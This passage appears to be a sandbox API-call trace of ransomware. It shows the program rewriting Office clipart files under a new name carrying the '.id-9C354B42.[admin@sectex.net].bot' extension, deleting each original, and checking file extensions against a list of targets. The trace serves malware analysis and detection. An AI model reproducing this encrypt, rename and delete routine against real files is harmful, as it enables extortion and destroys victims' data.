	[0139.976] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_02.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0139.977] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_02.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0139.977] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.977] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.977] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_02.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0139.978] GetLastError () returned 0x0
	[0139.978] ReadFile (in: hFile=0x3a8, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x2466, lpOverlapped=0x0) returned 1
	[0139.980] WriteFile (in: hFile=0x3ac, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x2470, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x2470, lpOverlapped=0x0) returned 1
	[0139.981] ReadFile (in: hFile=0x3a8, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0139.981] WriteFile (in: hFile=0x3ac, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0139.981] SetEndOfFile (hFile=0x3ac) returned 1
	[0139.981] CloseHandle (hObject=0x3ac) returned 1
	[0139.981] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.981] SetEndOfFile (hFile=0x3a8) returned 1
	[0139.983] CloseHandle (hObject=0x3a8) returned 1
	[0139.983] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0139.984] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_02.mid")) returned 1
	[0139.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63
	[0139.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63
	[0139.984] lstrlenW (lpString=".doc") returned 4
	[0139.984] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0139.984] lstrlenW (lpString=".docx") returned 5
	[0139.984] lstrcmpiW (lpString1=".docx", lpString2="2.MID") returned -1
	[0139.984] lstrlenW (lpString=".pdf") returned 4
	[0139.984] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0139.984] lstrlenW (lpString=".xls") returned 4
	[0139.984] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0139.984] lstrlenW (lpString=".xlsx") returned 5
	[0139.984] lstrcmpiW (lpString1=".xlsx", lpString2="2.MID") returned -1
	[0139.984] lstrlenW (lpString=".ppt") returned 4
	[0139.984] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0139.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63
	[0139.985] lstrlenW (lpString=".zip") returned 4
	[0139.985] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0139.985] lstrlenW (lpString=".rar") returned 4
	[0139.985] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0139.985] lstrlenW (lpString=".bz2") returned 4
	[0139.985] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0139.985] lstrlenW (lpString=".7z") returned 3
	[0139.985] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0139.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63
	[0139.985] lstrlenW (lpString=".dbf") returned 4
	[0139.985] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0139.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63
	[0139.985] lstrlenW (lpString=".1cd") returned 4
	[0139.985] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0139.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63
	[0139.985] lstrlenW (lpString=".jpg") returned 4
	[0139.985] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0139.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63
	[0139.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63
	[0139.985] lstrlenW (lpString=".doc") returned 4
	[0139.985] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0139.985] lstrlenW (lpString=".docx") returned 5
	[0139.985] lstrcmpiW (lpString1=".docx", lpString2="2.MID") returned -1
	[0139.985] lstrlenW (lpString=".pdf") returned 4
	[0139.985] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0139.985] lstrlenW (lpString=".xls") returned 4
	[0139.985] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0139.985] lstrlenW (lpString=".xlsx") returned 5
	[0139.985] lstrcmpiW (lpString1=".xlsx", lpString2="2.MID") returned -1
	[0139.985] lstrlenW (lpString=".ppt") returned 4
	[0139.985] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0139.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63
	[0139.986] lstrlenW (lpString=".zip") returned 4
	[0139.986] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0139.986] lstrlenW (lpString=".rar") returned 4
	[0139.986] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0139.986] lstrlenW (lpString=".bz2") returned 4
	[0139.986] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0139.986] lstrlenW (lpString=".7z") returned 3
	[0139.986] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0139.986] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63
	[0139.986] lstrlenW (lpString=".dbf") returned 4
	[0139.986] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0139.986] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63
	[0139.986] lstrlenW (lpString=".1cd") returned 4
	[0139.986] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0139.986] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63
	[0139.986] lstrlenW (lpString=".jpg") returned 4
	[0139.986] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0139.986] lstrcmpiW (lpString1=".MID", lpString2=".bot") returned 1
	[0139.987] lstrlenW (lpString="GRDEN_01.MID") returned 12
	[0139.987] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grden_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0140.028] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=7567) returned 1
	[0140.028] CloseHandle (hObject=0x3a4) returned 1
	[0140.028] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grden_01.mid")) returned 0x20
	[0140.117] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grden_01.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.178] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grden_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0140.200] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.200] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.201] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grden_01.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0140.201] GetLastError () returned 0x0
	[0140.201] ReadFile (in: hFile=0x37c, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x1d8f, lpOverlapped=0x0) returned 1
	[0140.270] WriteFile (in: hFile=0x31c, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x1d90, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x1d90, lpOverlapped=0x0) returned 1
	[0140.271] ReadFile (in: hFile=0x37c, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.271] WriteFile (in: hFile=0x31c, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.271] SetEndOfFile (hFile=0x31c) returned 1
	[0140.304] CloseHandle (hObject=0x31c) returned 1
	[0140.305] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.306] SetEndOfFile (hFile=0x37c) returned 1
	[0140.363] CloseHandle (hObject=0x37c) returned 1
	[0140.363] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.412] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grden_01.mid")) returned 1
	[0140.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 63
	[0140.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 63
	[0140.501] lstrlenW (lpString=".doc") returned 4
	[0140.501] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.501] lstrlenW (lpString=".docx") returned 5
	[0140.501] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.501] lstrlenW (lpString=".pdf") returned 4
	[0140.501] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.501] lstrlenW (lpString=".xls") returned 4
	[0140.501] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.501] lstrlenW (lpString=".xlsx") returned 5
	[0140.501] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.501] lstrlenW (lpString=".ppt") returned 4
	[0140.501] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 63
	[0140.501] lstrlenW (lpString=".zip") returned 4
	[0140.501] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.501] lstrlenW (lpString=".rar") returned 4
	[0140.501] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.501] lstrlenW (lpString=".bz2") returned 4
	[0140.501] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.501] lstrlenW (lpString=".7z") returned 3
	[0140.501] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 63
	[0140.501] lstrlenW (lpString=".dbf") returned 4
	[0140.501] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 63
	[0140.501] lstrlenW (lpString=".1cd") returned 4
	[0140.502] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 63
	[0140.502] lstrlenW (lpString=".jpg") returned 4
	[0140.502] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 63
	[0140.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 63
	[0140.502] lstrlenW (lpString=".doc") returned 4
	[0140.502] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.502] lstrlenW (lpString=".docx") returned 5
	[0140.502] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.502] lstrlenW (lpString=".pdf") returned 4
	[0140.502] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.502] lstrlenW (lpString=".xls") returned 4
	[0140.502] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.502] lstrlenW (lpString=".xlsx") returned 5
	[0140.502] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.502] lstrlenW (lpString=".ppt") returned 4
	[0140.502] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 63
	[0140.502] lstrlenW (lpString=".zip") returned 4
	[0140.502] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.502] lstrlenW (lpString=".rar") returned 4
	[0140.502] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.502] lstrlenW (lpString=".bz2") returned 4
	[0140.502] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.502] lstrlenW (lpString=".7z") returned 3
	[0140.502] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 63
	[0140.502] lstrlenW (lpString=".dbf") returned 4
	[0140.502] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 63
	[0140.502] lstrlenW (lpString=".1cd") returned 4
	[0140.502] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 63
	[0140.503] lstrlenW (lpString=".jpg") returned 4
	[0140.503] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.503] lstrcmpiW (lpString1=".MID", lpString2=".bot") returned 1
	[0140.503] lstrlenW (lpString="PARNT_02.MID") returned 12
	[0140.503] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_02.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0140.503] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=5714) returned 1
	[0140.503] CloseHandle (hObject=0x3a0) returned 1
	[0140.503] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_02.mid")) returned 0x20
	[0140.503] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_02.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.504] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_02.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0140.504] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.504] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.504] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_02.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0140.508] GetLastError () returned 0x0
	[0140.508] ReadFile (in: hFile=0x3a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x1652, lpOverlapped=0x0) returned 1
	[0140.511] WriteFile (in: hFile=0x384, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x1660, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x1660, lpOverlapped=0x0) returned 1
	[0140.511] ReadFile (in: hFile=0x3a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.511] WriteFile (in: hFile=0x384, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.512] SetEndOfFile (hFile=0x384) returned 1
	[0140.512] CloseHandle (hObject=0x384) returned 1
	[0140.512] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.512] SetEndOfFile (hFile=0x3a0) returned 1
	[0140.514] CloseHandle (hObject=0x3a0) returned 1
	[0140.514] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.516] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_02.mid")) returned 1
	[0140.516] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 63
	[0140.516] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 63
	[0140.516] lstrlenW (lpString=".doc") returned 4
	[0140.516] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.516] lstrlenW (lpString=".docx") returned 5
	[0140.516] lstrcmpiW (lpString1=".docx", lpString2="2.MID") returned -1
	[0140.516] lstrlenW (lpString=".pdf") returned 4
	[0140.516] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.517] lstrlenW (lpString=".xls") returned 4
	[0140.517] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.517] lstrlenW (lpString=".xlsx") returned 5
	[0140.517] lstrcmpiW (lpString1=".xlsx", lpString2="2.MID") returned -1
	[0140.517] lstrlenW (lpString=".ppt") returned 4
	[0140.517] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 63
	[0140.517] lstrlenW (lpString=".zip") returned 4
	[0140.517] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.517] lstrlenW (lpString=".rar") returned 4
	[0140.517] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.517] lstrlenW (lpString=".bz2") returned 4
	[0140.517] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.517] lstrlenW (lpString=".7z") returned 3
	[0140.517] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 63
	[0140.517] lstrlenW (lpString=".dbf") returned 4
	[0140.517] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 63
	[0140.517] lstrlenW (lpString=".1cd") returned 4
	[0140.517] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 63
	[0140.517] lstrlenW (lpString=".jpg") returned 4
	[0140.517] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 63
	[0140.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 63
	[0140.517] lstrlenW (lpString=".doc") returned 4
	[0140.517] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.517] lstrlenW (lpString=".docx") returned 5
	[0140.517] lstrcmpiW (lpString1=".docx", lpString2="2.MID") returned -1
	[0140.517] lstrlenW (lpString=".pdf") returned 4
	[0140.517] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.517] lstrlenW (lpString=".xls") returned 4
	[0140.518] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.518] lstrlenW (lpString=".xlsx") returned 5
	[0140.518] lstrcmpiW (lpString1=".xlsx", lpString2="2.MID") returned -1
	[0140.518] lstrlenW (lpString=".ppt") returned 4
	[0140.518] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 63
	[0140.518] lstrlenW (lpString=".zip") returned 4
	[0140.518] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.518] lstrlenW (lpString=".rar") returned 4
	[0140.518] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.518] lstrlenW (lpString=".bz2") returned 4
	[0140.518] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.518] lstrlenW (lpString=".7z") returned 3
	[0140.518] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 63
	[0140.518] lstrlenW (lpString=".dbf") returned 4
	[0140.518] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 63
	[0140.518] lstrlenW (lpString=".1cd") returned 4
	[0140.518] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 63
	[0140.518] lstrlenW (lpString=".jpg") returned 4
	[0140.518] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.518] lstrcmpiW (lpString1=".MID", lpString2=".bot") returned 1
	[0140.518] lstrlenW (lpString="PARNT_03.MID") returned 12
	[0140.518] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_03.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0140.519] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=8538) returned 1
	[0140.519] CloseHandle (hObject=0x3a0) returned 1
	[0140.519] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_03.mid")) returned 0x20
	[0140.519] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_03.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
